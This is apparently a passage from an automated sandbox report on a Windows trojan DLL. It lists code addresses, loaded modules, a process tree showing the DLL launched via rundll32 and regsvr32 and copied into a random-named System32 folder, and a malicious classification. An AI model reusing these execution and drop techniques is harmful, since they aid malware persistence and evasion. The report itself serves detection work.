                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001FDEC520000
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001E218400000
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001F1CA7B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02480000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001ACA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002AE44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180025278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800046A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180004ACA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                      Source: 1Klocu2k7B.dllVirustotal: Detection: 31%
                      Source: 1Klocu2k7B.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\1Klocu2k7B.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1Klocu2k7B.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\1Klocu2k7B.dll,DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\1Klocu2k7B.dll,DllUnregisterServer
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JRkpZLNCkFz\TYmfFCbFTVEkATZ.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 992 -s 316
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1Klocu2k7B.dll
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\1Klocu2k7B.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\1Klocu2k7B.dll,DllUnregisterServer
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JRkpZLNCkFz\TYmfFCbFTVEkATZ.dll"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                      Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER188F.tmpJump to behavior
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@29/10@0/2
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess992
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7164:120:WilError_01
                      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 1Klocu2k7B.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: 1Klocu2k7B.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: rundll32.exe, 00000006.00000000.303936013.0000000BB7475000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.329633207.0000000BB7475000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.807116513.0000000000A75000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: rundll32.exe, 00000006.00000000.303936013.0000000BB7475000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.329633207.0000000BB7475000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.807116513.0000000000A75000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd
